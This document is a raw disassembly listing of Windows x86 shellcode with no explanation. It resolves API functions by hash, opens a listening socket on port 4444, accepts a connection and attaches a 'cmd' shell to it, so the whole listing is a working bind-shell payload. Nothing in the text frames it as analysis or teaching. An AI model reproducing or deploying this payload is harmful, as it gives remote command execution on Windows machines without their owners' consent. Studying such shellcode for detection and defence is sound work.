  0:	fc                   	cld    
   1:	e8 89 00 00 00       	call   0x8f 
   6:	60                   	pusha  
   7:	89 e5                	mov    ebp,esp 
   9:	31 d2                	xor    edx,edx 
   b:	64 8b 52 30          	mov    edx,DWORD PTR fs:[edx+0x30] 
   f:	8b 52 0c             	mov    edx,DWORD PTR [edx+0xc] 
  12:	8b 52 14             	mov    edx,DWORD PTR [edx+0x14] 
  15:	8b 72 28             	mov    esi,DWORD PTR [edx+0x28] 
  18:	0f b7 4a 26          	movzx  ecx,WORD PTR [edx+0x26] 
  1c:	31 ff                	xor    edi,edi 
  1e:	31 c0                	xor    eax,eax 
  20:	ac                   	lods   al,BYTE PTR ds:[esi] 
  21:	3c 61                	cmp    al,0x61 
  23:	7c 02                	jl     0x27 
  25:	2c 20                	sub    al,0x20 
  27:	c1 cf 0d             	ror    edi,0xd 
  2a:	01 c7                	add    edi,eax 
  2c:	e2 f0                	loop   0x1e 
  2e:	52                   	push   edx 
  2f:	57                   	push   edi 
  30:	8b 52 10             	mov    edx,DWORD PTR [edx+0x10] 
  33:	8b 42 3c             	mov    eax,DWORD PTR [edx+0x3c] 
  36:	01 d0                	add    eax,edx 
  38:	8b 40 78             	mov    eax,DWORD PTR [eax+0x78] 
  3b:	85 c0                	test   eax,eax 
  3d:	74 4a                	je     0x89 
  3f:	01 d0                	add    eax,edx 
  41:	50                   	push   eax 
  42:	8b 48 18             	mov    ecx,DWORD PTR [eax+0x18] 
  45:	8b 58 20             	mov    ebx,DWORD PTR [eax+0x20] 
  48:	01 d3                	add    ebx,edx 
  4a:	e3 3c                	jecxz  0x88 
  4c:	49                   	dec    ecx 
  4d:	8b 34 8b             	mov    esi,DWORD PTR [ebx+ecx*4] 
  50:	01 d6                	add    esi,edx 
  52:	31 ff                	xor    edi,edi 
  54:	31 c0                	xor    eax,eax 
  56:	ac                   	lods   al,BYTE PTR ds:[esi] 
  57:	c1 cf 0d             	ror    edi,0xd 
  5a:	01 c7                	add    edi,eax 
  5c:	38 e0                	cmp    al,ah 
  5e:	75 f4                	jne    0x54 
  60:	03 7d f8             	add    edi,DWORD PTR [ebp-0x8] 
  63:	3b 7d 24             	cmp    edi,DWORD PTR [ebp+0x24] 
  66:	75 e2                	jne    0x4a 
  68:	58                   	pop    eax 
  69:	8b 58 24             	mov    ebx,DWORD PTR [eax+0x24] 
  6c:	01 d3                	add    ebx,edx 
  6e:	66 8b 0c 4b          	mov    cx,WORD PTR [ebx+ecx*2] 
  72:	8b 58 1c             	mov    ebx,DWORD PTR [eax+0x1c] 
  75:	01 d3                	add    ebx,edx 
  77:	8b 04 8b             	mov    eax,DWORD PTR [ebx+ecx*4] 
  7a:	01 d0                	add    eax,edx 
  7c:	89 44 24 24          	mov    DWORD PTR [esp+0x24],eax 
  80:	5b                   	pop    ebx 
  81:	5b                   	pop    ebx 
  82:	61                   	popa   
  83:	59                   	pop    ecx 
  84:	5a                   	pop    edx 
  85:	51                   	push   ecx 
  86:	ff e0                	jmp    eax 
  88:	58                   	pop    eax 
  89:	5f                   	pop    edi 
  8a:	5a                   	pop    edx 
  8b:	8b 12                	mov    edx,DWORD PTR [edx] 
  8d:	eb 86                	jmp    0x15 
  8f:	5d                   	pop    ebp 
  90:	68 33 32 00 00       	push   0x3233 
  95:	68 77 73 32 5f       	push   0x5f327377 
  9a:	54                   	push   esp 
  9b:	68 4c 77 26 07       	push   0x726774c 
  a0:	ff d5                	call   ebp 
  a2:	b8 90 01 00 00       	mov    eax,0x190 
  a7:	29 c4                	sub    esp,eax 
  a9:	54                   	push   esp 
  aa:	50                   	push   eax 
  ab:	68 29 80 6b 00       	push   0x6b8029 
  b0:	ff d5                	call   ebp 
  b2:	50                   	push   eax 
  b3:	50                   	push   eax 
  b4:	50                   	push   eax 
  b5:	50                   	push   eax 
  b6:	40                   	inc    eax 
  b7:	50                   	push   eax 
  b8:	40                   	inc    eax 
  b9:	50                   	push   eax 
  ba:	68 ea 0f df e0       	push   0xe0df0fea 
  bf:	ff d5                	call   ebp 
  c1:	89 c7                	mov    edi,eax 
  c3:	31 db                	xor    ebx,ebx 
  c5:	53                   	push   ebx 
  c6:	68 02 00 11 5c       	push   0x5c110002 
  cb:	89 e6                	mov    esi,esp 
  cd:	6a 10                	push   0x10 
  cf:	56                   	push   esi 
  d0:	57                   	push   edi 
  d1:	68 c2 db 37 67       	push   0x6737dbc2 
  d6:	ff d5                	call   ebp 
  d8:	53                   	push   ebx 
  d9:	57                   	push   edi 
  da:	68 b7 e9 38 ff       	push   0xff38e9b7 
  df:	ff d5                	call   ebp 
  e1:	53                   	push   ebx 
  e2:	53                   	push   ebx 
  e3:	57                   	push   edi 
  e4:	68 74 ec 3b e1       	push   0xe13bec74 
  e9:	ff d5                	call   ebp 
  eb:	57                   	push   edi 
  ec:	89 c7                	mov    edi,eax 
  ee:	68 75 6e 4d 61       	push   0x614d6e75 
  f3:	ff d5                	call   ebp 
  f5:	68 63 6d 64 00       	push   0x646d63 
  fa:	89 e3                	mov    ebx,esp 
  fc:	57                   	push   edi 
  fd:	57                   	push   edi 
  fe:	57                   	push   edi 
  ff:	31 f6                	xor    esi,esi 
 101:	6a 12                	push   0x12 
 103:	59                   	pop    ecx 
 104:	56                   	push   esi 
 105:	e2 fd                	loop   0x104 
 107:	66 c7 44 24 3c 01 01 	mov    WORD PTR [esp+0x3c],0x101 
 10e:	8d 44 24 10          	lea    eax,[esp+0x10] 
 112:	c6 00 44             	mov    BYTE PTR [eax],0x44 
 115:	54                   	push   esp 
 116:	50                   	push   eax 
 117:	56                   	push   esi 
 118:	56                   	push   esi 
 119:	56                   	push   esi 
 11a:	46                   	inc    esi 
 11b:	56                   	push   esi 
 11c:	4e                   	dec    esi 
 11d:	56                   	push   esi 
 11e:	56                   	push   esi 
 11f:	53                   	push   ebx 
 120:	56                   	push   esi 
 121:	68 79 cc 3f 86       	push   0x863fcc79 
 126:	ff d5                	call   ebp 
 128:	89 e0                	mov    eax,esp 
 12a:	4e                   	dec    esi 
 12b:	56                   	push   esi 
 12c:	46                   	inc    esi 
 12d:	ff 30                	push   DWORD PTR [eax] 
 12f:	68 08 87 1d 60       	push   0x601d8708 
 134:	ff d5                	call   ebp 
 136:	bb f0 b5 a2 56       	mov    ebx,0x56a2b5f0 
 13b:	68 a6 95 bd 9d       	push   0x9dbd95a6 
 140:	ff d5                	call   ebp 
 142:	3c 06                	cmp    al,0x6 
 144:	7c 0a                	jl     0x150 
 146:	80 fb e0             	cmp    bl,0xe0 
 149:	75 05                	jne    0x150 
 14b:	bb 47 13 72 6f       	mov    ebx,0x6f721347 
 150:	6a 00                	push   0x0 
 152:	53                   	push   ebx 
 153:	ff d5                	call   ebp 
